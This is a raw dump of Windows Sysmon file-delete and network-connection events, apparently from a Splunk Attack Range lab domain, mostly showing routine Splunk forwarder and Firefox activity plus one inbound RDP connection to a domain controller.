07:46:33.738{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7F7EDFA49A35351F8FB4D04D55687CB,SHA256=F98E63D7B7837115747A6E2FE42675FA31C296D44297A82FEC85181A03B07273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806561Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:34.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=583FA28E855FA9CC741708EF30038915,SHA256=DB40701B4AE9F2AAA042AA06E4DFB8EE894D17C5325F01100B77CA4D50C5826F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:34.754{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8591C1245CB700F11AB366EBE7E1A1D5,SHA256=AB73940B03C8332B598FB84D948C3121089704DEAFD93D21FCBE8EAA10C17D4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:25.607{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50941-false10.0.1.12-8000- 23542300x8000000000000000806562Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:35.970{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=175142F17EFA94DC0EC914C497CEC782,SHA256=2A33081BEAC8411976E09F895D5F4651D83443E172FA136DDDDE657A0311DE64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:35.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=579203ADED623871968C6D0C7BF82588,SHA256=BAE4A301084573E6C22F54F3529D522CA9637A144CC547A66C2B51FA64CDBEBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:36.766{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15D9551E9281D89E67F54467E99DA055,SHA256=7579F1BD7469E7279B405E558EE0349812B274A651B6E5DE24A07A00A525CFDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:37.783{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1403FED87C7317B13A14CC162880E5A,SHA256=A0F21E87D48389DA185CD7C34B3D52EA2B5035DB874502E1B1927C53743CEBDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806563Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:37.002{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48387DC30F6C2B18D8B5F6CA194F6A80,SHA256=23268A12013611CC3D64A0D9B4E34B372DD10A9CC37FC63372B3772D33FD1640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:38.801{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5CBB383205CFCEB67B5CC53FC9E2E1A,SHA256=F60A6CF5F5BF708F3598651EEFDFA0CD9E641FC15A8D1BB5806AF623A9E76CBB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806565Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:37.197{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57191-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806564Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:38.033{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=486B13F5EBF1C78FB02C157E04AA08B7,SHA256=D1E3FC144D608D7FB2587948E653B8C6EBFE486FC9A3A3E54AD1D4D0E2C31049,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:38.467{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6762C01EC88FDA027FDE0F2BB134F93A,SHA256=6F1AF35BA248CBEC320A27BB9B3C930BD379ADED454B4D5AF8ECB50D04E0CB02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:39.819{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=179DF52F9E21880A083251D092C1DC1B,SHA256=4FD04F4531B755CD44CA6F12E97CB9FD4FBAFF4F978D5DC39D6C3A1397DE6A32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806566Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:39.048{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15295900882C9FDA0B481EAD935BE25E,SHA256=0C84A6941B26C086C160E2058662BA9D0D35E9C98D07E5A94218646F49232347,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:30.735{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50942-false10.0.1.12-8000- 23542300x80000000000000001046713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:40.835{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DD0FD8CF073C4CA3CEB147F5BAFA128,SHA256=C6FCA232657D25BF8EC2F0125CBCE7BCA2BF8B3DD9BFD53029E1628AFA955DD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806567Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:40.095{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C2C03B5B17EBED396603BD2ED76D114,SHA256=1325AF5EEF1B2723B4FB82D2F851B61D97112456102564864FD88B2410874874,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:41.849{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E83B85ABEAA7D9332E7719E5EA52E9D,SHA256=23CCF2714EAEA146E0CA35D997F209A4790F1509890A0704EC65C1C61A01BCC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806568Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:41.127{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AB1E956AB952BA951ABDD9601BDC68A,SHA256=185654CEED088D4A1D6805C4BE954AF6FDB1B3FC75F64F1CE2C7246055C2F79D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:42.864{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14AFCA112E783126F2E30DF5B816C764,SHA256=DF37F47FB3493CC97806FC4786E96827224E68312DE350435E13E5C78FB7CD6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806569Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:42.170{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB33D5F0A3D7C7CB7E1DCBDA194AB962,SHA256=F86D63156B19C16CEA5FCB377DBEDAE21BF4CF52CA0544B752619E58650C87B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:43.865{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FE388E0CD30B5D8E255F54718C102A0,SHA256=8BF4358575D8CC5C6B78E2820ED9AA0805C1D4BAC437B725B416578F7A1779F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806571Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:42.397{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57192-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806570Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:43.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70A837AFA9BCE79D63F4218D563EB3D3,SHA256=4BBF1AE1387BBED58E80003B9F67A666BA7495D63D498980AD0C37C7376FA3C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:44.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4272C45CBC2BD65D328A6F6784C6DD7D,SHA256=371F50472C7D9B9E858C2B155FFD6D64FC7FCE92C5A9A1628D9538948DDAA395,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:44.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9157EF08F5618D8BE42A815D647BD25C,SHA256=FDD4506C3350659944955BAAAFB5AC985C888AA1923F55C94884D951C99ED656,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:44.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99447ADC2CC6F63E41C646BCEA0EADA2,SHA256=E7400B31D2C5C76AB2C20CA5ECC10C851A91F320EFBCA803555B41F1016E391C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806572Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:44.250{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D109231B84A8F1FC507B35B275CF5248,SHA256=61D6766ECFD3F8374EBFC7D8CA860C307B04390A906B55B6E769FA83556C264E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:35.786{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50943-false10.0.1.12-8000- 23542300x80000000000000001046733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.916{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78FD72A7703E5F7A1A3B60A7752CD393,SHA256=3C192C5DF6A3F6A45CEC055E78A63C74C16D813B7070AC17930C2142C1CC3FA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806573Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:45.250{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C285CDAF8DE9ACA27C3AD4E4883FCA7,SHA256=2C54D09EEC9E325860BBE39B1C9EACED880ACB042286DB7A6907A537EDCBF9BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:37.096{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-50062-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001046731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.048{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=AEE892DFEF9DEE839318FF15CC4577B4,SHA256=8EE4797C5CA70284B8C9AA89ED7F332FC630FD393657DD7BB19FCD815BCB6FD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.048{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F22DFEE6F0ABD0CFB3C3600DE1E9779D,SHA256=DF2A7BD8F177A3E693ED3A347F538906568C71BA87CFA71E9CDA8EDDBED18E6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.048{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C5B1FEFBC274B5DBDB6DF52406C9F523,SHA256=C08BE258D1A71EA401793C4087C377B0421425308417785E300E741AF7B173DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=655448F0629020965BD726845F3CBF27,SHA256=66967BCDD77CB9F12B22E8192371A20147B82114E07E558BF3C6C4B3A554EC2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0E615B92F67F25D5C6BA0BC0B0127149,SHA256=933180266DA365E71BF2ED8B714D4D3B815FFE7899D6DE556D568A0794913A16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=AF76039D34F57B04C12E05A91DA8C8D2,SHA256=27CF0E2AC838F178F6C18346BBDBD4B68728A808F02846A872F7AB09A930282B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=08F4DADC170013E929830916033C8D95,SHA256=6900E202527C9B3C9D6DE42219021FB241491A42C149DCECA86D23FB390EEFA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B5D38A45F37FF8B9A01BF64B0D5FB120,SHA256=CB929E4F7A44A8AEE875D0AA60ED8A6B20CE9B2ED9117879A74DCB01FDBD7DA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=192D4BCB9224891C9C2EC4E0775C8525,SHA256=97FA256B8D40C8D7E248D4E2E6F9A3BA1E39AC913B5FB20789FD225EF406012F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CB6BCC0341238F249AA41C095D405097,SHA256=1D41BDA416DB780814591B2F0A4A1B13A4C58E9BE8C2F1BBC168E8A1F77C9449,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3B3A806C40B0E8B69BBB91CE6BEA5D9E,SHA256=9E0B5C4423469A1B92606B5FD1C3F7DA19E92691841237CC3A731DB3B8FC697F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:46.916{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88E8E11C1E43CEA347DDA5BBD3898CD3,SHA256=544B5F3E28EBD526C32A9DDC7121D4C607C97B35E48249C51A5DE1AE54A99E59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806574Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:46.250{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27CDDB46391E5BC3D4B40F8487E5634A,SHA256=12F71137843F02593F0E1D1D79125A1DD92D3C8C9175F4FB0FEB738BABEF80D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:47.931{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=843158182DCDCE96EA905A65CEC21F4F,SHA256=A1DA03C43838ADA0F62B3488FB408C4935CCC6F417CC44F6E67B564EA4F5802D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806575Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:47.297{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=527B4864073F8880021E1E0C2E48371F,SHA256=0513BB660CBCCA8C960FD5C1479B0D5188CF51FBBF1BCF993D71F68C3E9D118B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:48.962{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2C4775582B5D4FC4BCDC6325A7C036E,SHA256=7309D5A9274BCC628C4278D9FEDCBE61AA4DA8BDF322C9C0E38D320293B59662,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806576Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:48.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22D476205BF21604285EFCB94457922D,SHA256=2D5683285C9A3C7FB1F3A340E57DC87EF67C194D8C7A3F59EAC57AFF68B9EE53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:49.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8550D4F4A3D38C99F41D1BF04EF005FE,SHA256=F789B96E6D841DF6F93783ABB660AA38D7D992858066FC386624623634796D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806577Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:49.344{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F535844F2BF8922149808CC749A888F9,SHA256=48AF53D4A4309A0ABF1FEC947A06330AC89BACAB58FC1F8AB184D6F10F2C0002,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:41.569{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 